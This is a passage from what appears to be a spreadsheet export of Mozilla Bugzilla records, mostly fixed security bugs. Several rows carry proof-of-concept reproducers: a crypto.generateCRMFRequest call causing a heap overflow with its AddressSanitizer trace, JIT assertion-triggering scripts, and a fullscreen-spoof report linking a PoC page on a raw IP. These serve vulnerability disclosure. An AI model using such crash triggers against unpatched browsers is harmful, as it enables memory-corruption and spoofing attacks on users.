      <c r="I2746" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2746" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K2746" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2746" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2746" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2746" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2746" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2746" t="inlineStr">
        <is>
          <t>[adv-main23+][adv-esr1709+]</t>
        </is>
      </c>
      <c r="Q2746" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2746" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2746" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T2746" t="n">
        <v>1</v>
      </c>
      <c r="U2746" t="n">
        <v>0</v>
      </c>
      <c r="V2746" t="n">
        <v>46</v>
      </c>
      <c r="W2746" t="inlineStr">
        <is>
          <t>The following JavaScript code crashes Firefox Nighly:
o200 = document.documentElement;
o1 = crypto;
try{o1.generateCRMFRequest(o200.writeln,o200,'X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X X',null,o1,1404343237,Math.PI,[]);}catch(e){}
Asan:
==26839== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f76344d8c3f at pc 0x7f76595e4d0a bp 0x7fffeab94e80 sp 0x7fffeab94e78
READ of size 1 at 0x7f76344d8c3f thread T0
    #0 0x7f76595e4d09 in cryptojs_interpret_key_gen_type(char*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/security/manager/ssl/src/nsCrypto.cpp:360:0
    #1 0x7f76595dabe2 in cryptojs_ReadArgsAndGenerateKey(JSContext*, JS::Value*, nsKeyPairInfoStr*, nsIInterfaceRequestor*, PK11SlotInfoStr**, bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/security/manager/ssl/src/nsCrypto.cpp:947:0
    #2 0x7f76595da0fc in nsCrypto::GenerateCRMFRequest(nsIDOMCRMFObject**) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/security/manager/ssl/src/nsCrypto.cpp:1980:0
    #3 0x7f765a66fb05 in NS_InvokeByIndex /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162:0
    #4 0x7f76592c4c63 in CallMethodHelper::Call() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2267:0
    #5 0x7f76592c4913 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2233:0
    #6 0x7f76592d9be7 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1480:0
    #7 0x7f765b8f4c48 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxtinlines.h:349:0
    #8 0x7f765b8f4395 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:381:0
    #9 0x7f765b8ee7fa in
    #10 0x7f765b8e2adc in js::RunScript(JSContext*, js::StackFrame*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:345:0
    #11 0x7f765b8f65a4 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:530:0
    #12 0x7f765b8f6bf7 in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:569:0
    #13 0x7f765ba75dcc in JS::Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions, unsigned short const*, unsigned long, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsapi.cpp:5689:0
    #14 0x7f7658a2d433 in nsJSContext::EvaluateString(nsAString_internal const&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, bool, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/dom/base/nsJSEnvironment.cpp:1278:0
    #15 0x7f76589eecb9 in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/dom/base/nsGlobalWindow.cpp:10193:0
    #16 0x7f76589db5cc in nsGlobalWindow::RunTimeout(nsTimeout*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/dom/base/nsGlobalWindow.cpp:10437:0
    #17 0x7f76589ee1f7 in nsGlobalWindow::TimerCallback(nsITimer*, void*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/dom/base/nsGlobalWindow.cpp:10684:0
    #18 0x7f765a64041c in nsTimerImpl::Fire() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/xpcom/threads/nsTimerImpl.cpp:543:0
    #19 0x7f765a640c9c in nsTimerEvent::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/xpcom/threads/nsTimerImpl.cpp:627:0
    #20 0x7f765a63728b in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/xpcom/threads/nsThread.cpp:626:0
    #21 0x7f765a583931 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238:0
    #22 0x7f7659b3305b in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/ipc/glue/MessagePump.cpp:82:0
    #23 0x7f765a6e4051 in MessageLoop::RunInternal() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/ipc/chromium/src/base/message_loop.cc:219:0
    #24 0x7f765a6e3f4e in MessageLoop::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/ipc/chromium/src/base/message_loop.cc:186:0
    #25 0x7f7659986851 in nsBaseAppShell::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/widget/xpwidgets/nsBaseAppShell.cpp:163:0
    #26 0x7f765952b67f in nsAppStartup::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/toolkit/components/startup/nsAppStartup.cpp:269:0
    #27 0x7f7657304a39 in XREMain::XRE_mainRun() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/toolkit/xre/nsAppRunner.cpp:3851:0
    #28 0x7f7657305d77 in XREMain::XRE_main(int, char**, nsXREAppData const*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/toolkit/xre/nsAppRunner.cpp:3919:0
    #29 0x7f7657306701 in XRE_main /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/toolkit/xre/nsAppRunner.cpp:4121:0
    #30 0x40c7e6 in do_main(int, char**, nsIFile*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/browser/app/nsBrowserApp.cpp:272:0
    #31 0x40bd0f in main /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/browser/app/nsBrowserApp.cpp:632:0
    #32 0x7f766411fea4 in ?? ??:0
0x7f76344d8c3f is located 1 bytes to the left of 1-byte region [0x7f76344d8c40,0x7f76344d8c41)
allocated by thread T0 here:
    #0 0x43b1a0 in malloc ??:?
    #1 0x7f765b89bf59 in js::MallocProvider&lt;JSContext&gt;::malloc_(unsigned long) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxt.h:558:0
    #2 0x7f765c1811d7 in JS::LossyTwoByteCharsToNewLatin1CharsZ(JSContext*, JS::TwoByteChars) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/CharacterEncoding.cpp:21:0
    #3 0x7f765ba7afeb in JS_EncodeString(JSContext*, JSString*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsapi.cpp:6293:0
    #4 0x7f76592298c8 in JSAutoByteString::encodeLatin1(JSContext*, JSString*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsapi.h:4431:0
    #5 0x7f76595daba5 in cryptojs_ReadArgsAndGenerateKey(JSContext*, JS::Value*, nsKeyPairInfoStr*, nsIInterfaceRequestor*, PK11SlotInfoStr**, bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/security/manager/ssl/src/nsCrypto.cpp:945:0
    #6 0x7f76595da0fc in nsCrypto::GenerateCRMFRequest(nsIDOMCRMFObject**) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/security/manager/ssl/src/nsCrypto.cpp:1980:0
    #7 0x7f765a66fb05 in NS_InvokeByIndex /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162:0
    #8 0x7f76592c4c63 in CallMethodHelper::Call() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedNative.cpp:2267:0
Shadow byte and word:
  0x1feec689b187: fa
  0x1feec689b180: fa fa fa fa fa fa fa fa
More shadow bytes:
  0x1feec689b160: fa fa fa fa fa fa fa fa
  0x1feec689b168: 00 00 00 00 00 fb fb fb
  0x1feec689b170: fa fa fa fa fa fa fa fa
  0x1feec689b178: 00 00 02 fb fb fb fb fb
=&gt;0x1feec689b180: fa fa fa fa fa fa fa fa
  0x1feec689b188: 01 fb fb fb fb fb fb fb
  0x1feec689b190: fa fa fa fa fa fa fa fa
  0x1feec689b198: fa fa fa fa fa fa fa fa
  0x1feec689b1a0: fa fa fa fa fa fa fa fa
Stats: 231M malloced (213M for red zones) by 286553 calls
Stats: 34M realloced by 16332 calls
Stats: 202M freed by 148988 calls
Stats: 164M really freed by 111061 calls
Stats: 228M (58432 full pages) mmaped in 430 calls
  mmaps   by size class: 7:110565; 8:47081; 9:15345; 10:8176; 11:7395; 12:1280; 13:960; 14:512; 15:192; 16:656; 17:456; 18:26; 19:36; 20:21; 21:1;
  mallocs by size class: 7:161389; 8:61615; 9:24493; 10:17457; 11:12992; 12:2255; 13:1936; 14:1445; 15:341; 16:1164; 17:1366; 18:35; 19:41; 20:22; 21:2;
  frees   by size class: 7:75283; 8:24634; 9:16504; 10:14756; 11:11180; 12:1355; 13:1293; 14:1281; 15:233; 16:1028; 17:1352; 18:30; 19:37; 20:21; 21:1;
  rfrees  by size class: 7:56504; 8:16923; 9:10444; 10:12103; 11:9578; 12:1020; 13:995; 14:1136; 15:180; 16:804; 17:1323; 18:27; 19:22; 20:1; 21:1;
Stats: malloc large: 2971 small slow: 4402</t>
        </is>
      </c>
      <c r="X2746" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2747">
      <c r="A2747" t="n">
        <v>1334538</v>
      </c>
      <c r="B2747" t="inlineStr">
        <is>
          <t>2017-01-27 09:13:25 -0800</t>
        </is>
      </c>
      <c r="C2747" t="inlineStr">
        <is>
          <t>Enable sha1 repacks and bouncer aliases in ESR52</t>
        </is>
      </c>
      <c r="D2747" t="inlineStr">
        <is>
          <t>2017-02-27 17:30:37 -0800</t>
        </is>
      </c>
      <c r="E2747" t="n">
        <v>1</v>
      </c>
      <c r="F2747" t="n">
        <v>1</v>
      </c>
      <c r="G2747" t="n">
        <v>5</v>
      </c>
      <c r="H2747" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2747" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2747" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K2747" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2747" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2747" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2747" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2747" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2747" t="inlineStr"/>
      <c r="Q2747" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2747" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2747" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2747" t="n">
        <v>1</v>
      </c>
      <c r="U2747" t="n">
        <v>0</v>
      </c>
      <c r="V2747" t="n">
        <v>29</v>
      </c>
      <c r="W2747" t="inlineStr">
        <is>
          <t>We are going to redirect all XP new downloads to ESR52</t>
        </is>
      </c>
      <c r="X2747" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2748">
      <c r="A2748" t="n">
        <v>1509052</v>
      </c>
      <c r="B2748" t="inlineStr">
        <is>
          <t>2018-11-21 07:35:20 -0800</t>
        </is>
      </c>
      <c r="C2748" t="inlineStr">
        <is>
          <t>Compare view breaks</t>
        </is>
      </c>
      <c r="D2748" t="inlineStr">
        <is>
          <t>2019-02-27 12:59:14 -0800</t>
        </is>
      </c>
      <c r="E2748" t="n">
        <v>1</v>
      </c>
      <c r="F2748" t="n">
        <v>1</v>
      </c>
      <c r="G2748" t="n">
        <v>7</v>
      </c>
      <c r="H2748" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I2748" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J2748" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K2748" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L2748" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2748" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2748" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2748" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2748" t="inlineStr"/>
      <c r="Q2748" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2748" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2748" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2748" t="n">
        <v>1</v>
      </c>
      <c r="U2748" t="n">
        <v>0</v>
      </c>
      <c r="V2748" t="n">
        <v>4</v>
      </c>
      <c r="W2748" t="inlineStr">
        <is>
          <t>Just found a link which causes Compare view to throw an unexpected error:
TypeError: "$scope.originalResultSet is undefined"
	load webpack-internal:///./ui/js/controllers/perf/compare.js:316:25
	CompareResultsCtrl webpack-internal:///./ui/js/controllers/perf/compare.js:508:7
	processQueue webpack-internal:///./node_modules/angular/angular.js:17914:37
	scheduleProcessQueue webpack-internal:///./node_modules/angular/angular.js:17962:27
	digest webpack-internal:///./node_modules/angular/angular.js:19075:15
	evalAsync webpack-internal:///./node_modules/angular/angular.js:19395:15
	completeTask webpack-internal:///./node_modules/angular/angular.js:21194:7
	timeoutId webpack-internal:///./node_modules/angular/angular.js:6790:7
 Possibly unhandled rejection: {} angular.js:15536</t>
        </is>
      </c>
      <c r="X2748" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2749">
      <c r="A2749" t="n">
        <v>1061600</v>
      </c>
      <c r="B2749" t="inlineStr">
        <is>
          <t>2014-09-02 04:45:32 -0700</t>
        </is>
      </c>
      <c r="C2749" t="inlineStr">
        <is>
          <t>Assertion failure: [infer failure] Missing type in object [0x7f6dbe642938] : float, at jsinfer.cpp:288</t>
        </is>
      </c>
      <c r="D2749" t="inlineStr">
        <is>
          <t>2016-06-04 16:01:44 -0700</t>
        </is>
      </c>
      <c r="E2749" t="n">
        <v>1</v>
      </c>
      <c r="F2749" t="n">
        <v>1</v>
      </c>
      <c r="G2749" t="n">
        <v>3</v>
      </c>
      <c r="H2749" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2749" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2749" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2749" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2749" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2749" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2749" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2749" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2749" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main33+][adv-esr31.2+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q2749" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2749" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2749" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T2749" t="n">
        <v>1</v>
      </c>
      <c r="U2749" t="n">
        <v>0</v>
      </c>
      <c r="V2749" t="n">
        <v>21</v>
      </c>
      <c r="W2749" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision c360f3d1c00d (run with --fuzzing-safe --no-threads --ion-eager):
setJitCompilerOption("baseline.usecount.trigger", 10);
function newFunc(x) { new Function(x)(); };
newFunc('\
function test(m) {\
  do {\
    if (m = arr[0]) break;\
    m &gt;&gt;=  0;\
  }\
  while (0);\
  arr[("")] = m;\
}\
arr = new Float64Array(2);\
for(var i=0; i&lt;200; i++)\
  test(0);\
');
Object.preventExtensions(this);
eval("var x;");</t>
        </is>
      </c>
      <c r="X2749" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2750">
      <c r="A2750" t="n">
        <v>1647293</v>
      </c>
      <c r="B2750" t="inlineStr">
        <is>
          <t>2020-06-22 06:27:02 -0700</t>
        </is>
      </c>
      <c r="C2750" t="inlineStr">
        <is>
          <t>TypeSet containing only MagicOptimizedArguments in improveTypesAtTypeOfCompare</t>
        </is>
      </c>
      <c r="D2750" t="inlineStr">
        <is>
          <t>2024-03-13 04:43:08 -0700</t>
        </is>
      </c>
      <c r="E2750" t="n">
        <v>1</v>
      </c>
      <c r="F2750" t="n">
        <v>1</v>
      </c>
      <c r="G2750" t="n">
        <v>3</v>
      </c>
      <c r="H2750" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2750" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2750" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2750" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2750" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2750" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2750" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2750" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2750" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main79+][adv-ESR78.1+]</t>
        </is>
      </c>
      <c r="Q2750" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2750" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S2750" t="inlineStr">
        <is>
          <t>mozilla80</t>
        </is>
      </c>
      <c r="T2750" t="n">
        <v>1</v>
      </c>
      <c r="U2750" t="n">
        <v>0</v>
      </c>
      <c r="V2750" t="n">
        <v>14</v>
      </c>
      <c r="W2750" t="inlineStr">
        <is>
          <t>When running the following script
```
function foo() {
  let v3 = 0;
  while (v3 != 10000) {
    const v6 = typeof v3 === "number";
    if (v6) {
    } else {
        const v7 = v3 || 8;
    }
    const v8 = v3 + 1;
    v3 = arguments;
    v3 = v8;
  }
}
function main() {
    foo();
}
main();
gc();
```
Spidermonkey fails on the following assertion:
`Assertion failure: !IsMagicType(ins-&gt;type()) in js/src/jit/IonBuilder.cpp:2625`
`jit::AnalyzeArgumentsUsage` correctly determines that the arguments object is not needed and can be optimized out, which means that the TypeSet for `v3` is the union of types `int` and `MagicOptimizedArguments`. It seems that the compiler tries to optimize the typeof compare and propagate the type information to the branches. If the typeof compare is true, `v3` has to be a number in the true branch, which means that v3 has to be of type `MagicOptimizedArguments` in the false branch.
It does not seem to be a security issue as the false branch is always dead code but if the bug is observable in a branch taken at runtime, it might be a security issue like shown in https://bugs.chromium.org/p/project-zero/issues/detail?id=1794, which is why I am reporting this as a security issue. I tried to bisect the bug but failed to do so as I had troubles building spidermonkey versions pre 2017. It does trigger on builds from early 2017 to the latest commit as of now (3d39d3b7dd1b2be30692d4541ea681614e34c786) on the github mirror.</t>
        </is>
      </c>
      <c r="X2750" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2751">
      <c r="A2751" t="n">
        <v>1798798</v>
      </c>
      <c r="B2751" t="inlineStr">
        <is>
          <t>2022-11-02 15:13:57 -0700</t>
        </is>
      </c>
      <c r="C2751" t="inlineStr">
        <is>
          <t>Window prompt with long description hides fullscreen notification, leads to spoof</t>
        </is>
      </c>
      <c r="D2751" t="inlineStr">
        <is>
          <t>2024-05-30 11:02:06 -0700</t>
        </is>
      </c>
      <c r="E2751" t="n">
        <v>1</v>
      </c>
      <c r="F2751" t="n">
        <v>1</v>
      </c>
      <c r="G2751" t="n">
        <v>2</v>
      </c>
      <c r="H2751" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2751" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J2751" t="inlineStr">
        <is>
          <t>Browser Engine</t>
        </is>
      </c>
      <c r="K2751" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2751" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2751" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N2751" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2751" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2751" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][geckoview][fxdroid][adv-main111+]</t>
        </is>
      </c>
      <c r="Q2751" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2751" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2751" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T2751" t="n">
        <v>1</v>
      </c>
      <c r="U2751" t="n">
        <v>0</v>
      </c>
      <c r="V2751" t="n">
        <v>32</v>
      </c>
      <c r="W2751" t="inlineStr">
        <is>
          <t>Created attachment 9301665
poc.html
I found a vulnerability in firefox android where a window prompt with a long description can cover fullscreen notifications which can lead to spoofs.
steps to produce
1. open http://103.186.0.20/poc2.html or open poc.html
2. Click the open to google button
3. Then a dialog prompt window appears with a long description and covers the fullscreen notification
4 then click ok
OS: Android 10 (Samsung M31)
i attached the poc video files.
thank you</t>
        </is>
      </c>
      <c r="X2751" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2752">
      <c r="A2752" t="n">
        <v>1125389</v>
      </c>
      <c r="B2752" t="inlineStr">
        <is>
          <t>2015-01-23 14:41:36 -0800</t>
        </is>
      </c>
      <c r="C2752" t="inlineStr">
        <is>
          <t>ChangeObjectFixedSlotCount can make a non-extensible object extensible</t>
        </is>
      </c>
      <c r="D2752" t="inlineStr">
        <is>
          <t>2017-04-06 07:06:42 -0700</t>
        </is>
      </c>
      <c r="E2752" t="n">
        <v>1</v>
      </c>
      <c r="F2752" t="n">
        <v>1</v>
      </c>
      <c r="G2752" t="n">
        <v>3</v>
      </c>
      <c r="H2752" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2752" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2752" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2752" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2752" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2752" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2752" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2752" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2752" t="inlineStr">
        <is>
          <t>[adv-main36+]sec-high for Caja</t>
        </is>
      </c>
      <c r="Q2752" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2752" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2752" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T2752" t="n">
        <v>1</v>
      </c>
      <c r="U2752" t="n">
        <v>1</v>
      </c>
      <c r="V2752" t="n">
        <v>38</v>
      </c>
      <c r="W2752" t="inlineStr">
        <is>
          <t>Test below fails with --ion-eager --no-threads. I think the problem is that we reshape in ChangeObjectFixedSlotCount and then lose the not-extensible flag.
This was reduced from a jstest failure (ecma_6/Array/from_errors.js) with --ion-eager --no-threads
function Obj() {
    this.x = 0;
    Object.preventExtensions(this);
}
function test() {
    var A = new Obj();
    while (true) {
	assertEq(Object.isExtensible(A), false);
        return;
    }
    A.length1 = X;
}
test();</t>
        </is>
      </c>
      <c r="X2752" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2753">
      <c r="A2753" t="n">
        <v>891292</v>
      </c>
      <c r="B2753" t="inlineStr">
        <is>
          <t>2013-07-09 03:02:19 -0700</t>
        </is>
      </c>
      <c r="C2753" t="inlineStr">
        <is>
          <t>NativeKey should not continue handling key message if widget is destroyed after dispatching event</t>
        </is>
      </c>
      <c r="D2753" t="inlineStr">
        <is>
          <t>2014-11-19 20:11:57 -0800</t>
        </is>
      </c>
      <c r="E2753" t="n">
        <v>1</v>
      </c>
      <c r="F2753" t="n">
        <v>1</v>
      </c>
      <c r="G2753" t="n">
        <v>3</v>
      </c>
      <c r="H2753" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2753" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2753" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K2753" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2753" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2753" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N2753" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2753" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2753" t="inlineStr">
        <is>
          <t>[adv-main24+] possibly high/critical if we're underestimating the ease of winning the race</t>
        </is>
      </c>
      <c r="Q2753" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2753" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2753" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T2753" t="n">
        <v>1</v>
      </c>
      <c r="U2753" t="n">
        <v>0</v>
      </c>
      <c r="V2753" t="n">
        <v>25</v>
      </c>
      <c r="W2753" t="inlineStr">
        <is>
          <t>I realized that widget::NativeKey doesn't stop handling key message even if widget is destroyed by dispatching key event.
I'm not sure the risk of this bug, though.</t>
        </is>
      </c>
      <c r="X2753" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2754">
      <c r="A2754" t="n">
        <v>227417</v>
      </c>
      <c r="B2754" t="inlineStr">
        <is>
          <t>2003-12-03 17:22:43 -0800</t>
        </is>
      </c>
      <c r="C2754" t="inlineStr">
        <is>
          <t>Cross-domain exploit on zombie document with event handlers</t>
        </is>
      </c>
      <c r="D2754" t="inlineStr">
        <is>
          <t>2012-08-07 09:05:25 -0700</t>
        </is>
      </c>
      <c r="E2754" t="n">
        <v>1</v>
      </c>
      <c r="F2754" t="n">
        <v>1</v>
      </c>
      <c r="G2754" t="n">
        <v>3</v>
      </c>
      <c r="H2754" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2754" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2754" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K2754" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2754" t="inlineStr">
        <is>
          <t>All</t>
        </is>
